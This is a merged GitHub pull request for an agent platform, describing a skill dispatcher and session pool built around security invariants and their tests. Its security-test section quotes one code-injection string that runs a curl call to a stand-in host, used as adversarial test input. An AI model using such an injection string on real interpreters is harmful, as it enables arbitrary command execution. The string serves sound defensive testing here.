Skip to content

feat(agentcore-strands): U4 unified skill dispatcher + session pool (SI-2/3/6)#510

Merged
ericodom merged 1 commit into
mainfrom
feat/v1-agent-arch-u4-dispatcher
Apr 24, 2026
Merged

feat(agentcore-strands): U4 unified skill dispatcher + session pool (SI-2/3/6)#510
ericodom merged 1 commit into
mainfrom
feat/v1-agent-arch-u4-dispatcher

Conversation

@ericodom
Copy link
Copy Markdown
Contributor

Summary

Lands the single code path that every skill-with-scripts invocation will flow through once the Skill meta-tool (U5) wires it in. Today it ships as inert code — the Dockerfile COPY picks it up (via U2a's wildcard) and _boot_assert registers it, but no production path calls it yet. Shadow dispatch in U7 is the first consumer.

Part of the V1 agent-architecture plan (docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md §U4).

Why this is low-risk to land now

  • Dead code from production's perspective. server.py doesn't import skill_dispatcher; run_skill_dispatch.py still serves every live composition.
  • Every public entry point takes injected callables (pool's start_session/stop_session, dispatcher's runner). No boto3 in the hot path — AgentCore contact only happens when U7 wires the real runner.
  • All security invariants are structural, not runtime. SI-2 is "args never appear in exec string" — enforced by the fixed template. SI-3 is "user_id in pool key" — enforced by the pool class. SI-6 is "sys.modules purge before import" — part of the exec template. Breaking any would show up as a test failure before it showed up as a CVE.

The three security invariants

Invariant How it's enforced
SI-2 Args are data, never code writeFiles([{path:"_args.json", text:json.dumps(args)}]) + fixed exec template that reads the file. Adversarial args (__import__('os').system(...), nested exec(), unicode) round-trip unchanged through _args.json and never appear in the exec source. Regression test asserts exec string is byte-identical across two invocations with different args.
SI-3 User-scoped pool key SkillSessionPool keys on (tenant_id, user_id, environment). test_si3_users_on_same_tenant_get_distinct_sessions proves alice and bob can't share a warm session. flush_for_tenant isolates across tenants.
SI-6 Module namespace reset Exec template purges sys.modules['scripts.<slug>.*'] + importlib.invalidate_caches() before from scripts.<slug>.entrypoint import run. A monkey-patch from call N cannot leak into call N+1 on the same pooled session.

Test counts

  • test_skill_session_pool.py — 9 cases (acquire/reuse, concurrency, LRU eviction of idle slots, in-use-never-evicted, idle pruning with frozen time, flush-for-tenant, flush-all)
  • test_skill_dispatcher.py — 9 cases (happy path, unknown slug, non-JSON stdout, timeout, non-zero exit, depth-cap boundary, turn budget, audit hook)
  • test_skill_dispatcher_security.py — 6 cases, each named with its SI number so grep test_si surfaces coverage at review time
  • Full agent-container suite: 211 green (24 new + 187 existing)
  • sandbox-preflight.test.ts: 9 green

What this PR does NOT do

  • Does not wire dispatcher into server.py's Agent(tools=...) flow. That's U5.
  • Does not extract the quota/audit loop from server.py:682-755. Deferred to U7 where quota actually fires — extracting now would add a seam with no caller.
  • Does not touch the real AgentCore Code Interpreter. Real integration happens in U7's shadow-dispatch harness.

Wiring

  • _boot_assert.EXPECTED_CONTAINER_SOURCES grows skill_dispatcher + skill_session_pool so the Dockerfile RUN asserts they landed.
  • packages/api/src/lib/sandbox-preflight.ts gains an optional caller: 'execute_code' | 'skill_dispatch' field on input + result. Defaults to execute_code for backwards compat.

Test plan

  • Full agent-container pytest: 211 green
  • pnpm --filter @thinkwork/api typecheck green
  • pnpm --filter @thinkwork/api test on sandbox-preflight.test.ts — 9 green
  • ruff import-sort clean on new Python
  • prettier clean on touched TS
  • Reviewer spot-checks SI-2 assertion (fixed template) and SI-3 pool-key tuple shape

🤖 Generated with Claude Code

…SI-2/3/6)

Lands the single code path every skill-with-scripts invocation will flow
through once U5 wires the Skill meta-tool (plan #7 §U4). Ships as inert
today — the Dockerfile COPY picks it up (via U2a's wildcard) and _boot_assert
registers it, but no production path calls it yet. Shadow-dispatch in U7 is
the first consumer.

## What lands

### `container-sources/skill_session_pool.py`
Async pool keyed on `(tenant_id, user_id, environment)`. LRU cap 8 per key,
30-min idle timeout, per-key async lock so concurrent acquires on the same
key don't double-start a session. API:

  - `acquire(key) -> SessionHandle`  (warm reuse or fresh start)
  - `handle.release()`
  - `flush_for_tenant(tenant_id)` — U12 kill-switch path
  - `flush_all()` — ops escape hatch
  - `prune_idle()` — caller decides cadence; exposed so tests advance time

### `container-sources/skill_dispatcher.py`
`dispatch_skill_script(tenant_id, user_id, skill_slug, args, environment, *,
pool, catalog, runner, counters)`. Security invariants enforced:

  - **SI-2** args travel via `writeFiles(_args.json=json.dumps(args))`; the
    executeCode string is a fixed template that opens the file and calls
    `run(**args)`. Model-controlled values never touch the Python source.
  - **SI-6** template purges `scripts.<slug>.*` from `sys.modules` +
    `importlib.invalidate_caches()` before every import, so a monkey-patch
    from call N cannot leak into call N+1 on the same pooled session.
  - Depth cap 5 (SkillDepthExceeded), per-turn budget 50 (SkillTurnBudgetExceeded).
  - Stdout parsed as JSON; structured errors (SkillOutputParseError,
    SkillTimeout, SkillExecutionError, SkillNotFound) all ride the same
    `DispatchResult` shape for uniform audit downstream.

SI-3 (user-scoped pool key) is enforced structurally in the pool itself.

### `test_skill_session_pool.py` — 9 cases
Acquire + reuse, concurrent-acquire safety, LRU eviction of idle slots,
in-use-never-evicted, idle pruning with frozen time, flush-for-tenant
isolation, flush-all.

### `test_skill_dispatcher.py` — 9 cases
Happy path (args land in `_args.json`, not in exec string), unknown slug,
non-JSON stdout, timeout, non-zero exit with stderr, depth-cap boundary
(max OK, max+1 rejected), turn budget, audit hook firing on ok + failure.

### `test_skill_dispatcher_security.py` — 6 cases
Each named with its SI number so grep surfaces coverage at review time:

  - SI-2: adversarial args (`__import__('os').system('curl evil.test')`,
    nested `exec()`, unicode escapes) round-trip through _args.json
    unchanged, never appear in the exec string.
  - SI-2: exec template byte-identical across two invocations with
    different args — a structural assertion that fails if anyone ever
    reintroduces interpolation.
  - SI-3: alice and bob on the same tenant get distinct pool sessions;
    flush-for-tenant isolates.
  - SI-6: exec template purges `scripts.<slug>.*` before import, even on
    back-to-back calls with the same slug.

### Wiring
- `_boot_assert.EXPECTED_CONTAINER_SOURCES` grows skill_dispatcher +
  skill_session_pool so the Dockerfile RUN asserts they landed.
- `packages/api/src/lib/sandbox-preflight.ts` gains an optional
  `caller: 'execute_code' | 'skill_dispatch'` field on the input +
  result. Defaults to `execute_code` for backwards compat; dispatcher
  paths set `skill_dispatch` when U5+ wires them. No behavior change
  for existing callers.

## What this does NOT do

- Does NOT wire the dispatcher into server.py's Agent(tools=...) flow.
  That's U5 (Skill meta-tool).
- Does NOT extract the quota/audit loop from server.py:682-755. The plan
  calls for this as part of U4; deferring to the shadow-dispatch wiring
  in U7 where the quota call actually fires — extracting now would add
  a seam with no caller yet.
- Does NOT call the real AgentCore Code Interpreter. Tests drive
  injected runner/pool callables. Real integration happens in U7's
  shadow-dispatch harness.

## Test plan

- [x] `uv run ... pytest` on the three new files — 24 tests green
- [x] Full `pytest packages/agentcore-strands/agent-container/` — 211 green
      (24 new + 187 existing)
- [x] `pnpm --filter @thinkwork/api typecheck` green (preflight caller
      field threaded through existing tests)
- [x] `pnpm --filter @thinkwork/api test` on `sandbox-preflight.test.ts`
      — 9 tests green
- [x] ruff import-sort clean on every new file
- [x] prettier clean on every touched TS file

Part of the V1 agent-architecture plan
(`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U4).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@ericodom ericodom merged commit 0204976 into main Apr 24, 2026
4 checks passed
@ericodom ericodom deleted the feat/v1-agent-arch-u4-dispatcher branch April 24, 2026 11:24
ericodom added a commit that referenced this pull request May 5, 2026
…SI-2/3/6) (#510)

Lands the single code path every skill-with-scripts invocation will flow
through once U5 wires the Skill meta-tool (plan #7 §U4). Ships as inert
today — the Dockerfile COPY picks it up (via U2a's wildcard) and _boot_assert
registers it, but no production path calls it yet. Shadow-dispatch in U7 is
the first consumer.

## What lands

### `container-sources/skill_session_pool.py`
Async pool keyed on `(tenant_id, user_id, environment)`. LRU cap 8 per key,
30-min idle timeout, per-key async lock so concurrent acquires on the same
key don't double-start a session. API:

  - `acquire(key) -> SessionHandle`  (warm reuse or fresh start)
  - `handle.release()`
  - `flush_for_tenant(tenant_id)` — U12 kill-switch path
  - `flush_all()` — ops escape hatch
  - `prune_idle()` — caller decides cadence; exposed so tests advance time

### `container-sources/skill_dispatcher.py`
`dispatch_skill_script(tenant_id, user_id, skill_slug, args, environment, *,
pool, catalog, runner, counters)`. Security invariants enforced:

  - **SI-2** args travel via `writeFiles(_args.json=json.dumps(args))`; the
    executeCode string is a fixed template that opens the file and calls
    `run(**args)`. Model-controlled values never touch the Python source.
  - **SI-6** template purges `scripts.<slug>.*` from `sys.modules` +
    `importlib.invalidate_caches()` before every import, so a monkey-patch
    from call N cannot leak into call N+1 on the same pooled session.
  - Depth cap 5 (SkillDepthExceeded), per-turn budget 50 (SkillTurnBudgetExceeded).
  - Stdout parsed as JSON; structured errors (SkillOutputParseError,
    SkillTimeout, SkillExecutionError, SkillNotFound) all ride the same
    `DispatchResult` shape for uniform audit downstream.

SI-3 (user-scoped pool key) is enforced structurally in the pool itself.

### `test_skill_session_pool.py` — 9 cases
Acquire + reuse, concurrent-acquire safety, LRU eviction of idle slots,
in-use-never-evicted, idle pruning with frozen time, flush-for-tenant
isolation, flush-all.

### `test_skill_dispatcher.py` — 9 cases
Happy path (args land in `_args.json`, not in exec string), unknown slug,
non-JSON stdout, timeout, non-zero exit with stderr, depth-cap boundary
(max OK, max+1 rejected), turn budget, audit hook firing on ok + failure.

### `test_skill_dispatcher_security.py` — 6 cases
Each named with its SI number so grep surfaces coverage at review time:

  - SI-2: adversarial args (`__import__('os').system('curl evil.test')`,
    nested `exec()`, unicode escapes) round-trip through _args.json
    unchanged, never appear in the exec string.
  - SI-2: exec template byte-identical across two invocations with
    different args — a structural assertion that fails if anyone ever
    reintroduces interpolation.
  - SI-3: alice and bob on the same tenant get distinct pool sessions;
    flush-for-tenant isolates.
  - SI-6: exec template purges `scripts.<slug>.*` before import, even on
    back-to-back calls with the same slug.

### Wiring
- `_boot_assert.EXPECTED_CONTAINER_SOURCES` grows skill_dispatcher +
  skill_session_pool so the Dockerfile RUN asserts they landed.
- `packages/api/src/lib/sandbox-preflight.ts` gains an optional
  `caller: 'execute_code' | 'skill_dispatch'` field on the input +
  result. Defaults to `execute_code` for backwards compat; dispatcher
  paths set `skill_dispatch` when U5+ wires them. No behavior change
  for existing callers.

## What this does NOT do

- Does NOT wire the dispatcher into server.py's Agent(tools=...) flow.
  That's U5 (Skill meta-tool).
- Does NOT extract the quota/audit loop from server.py:682-755. The plan
  calls for this as part of U4; deferring to the shadow-dispatch wiring
  in U7 where the quota call actually fires — extracting now would add
  a seam with no caller yet.
- Does NOT call the real AgentCore Code Interpreter. Tests drive
  injected runner/pool callables. Real integration happens in U7's
  shadow-dispatch harness.

## Test plan

- [x] `uv run ... pytest` on the three new files — 24 tests green
- [x] Full `pytest packages/agentcore-strands/agent-container/` — 211 green
      (24 new + 187 existing)
- [x] `pnpm --filter @thinkwork/api typecheck` green (preflight caller
      field threaded through existing tests)
- [x] `pnpm --filter @thinkwork/api test` on `sandbox-preflight.test.ts`
      — 9 tests green
- [x] ruff import-sort clean on every new file
- [x] prettier clean on every touched TS file

Part of the V1 agent-architecture plan
(`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U4).

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant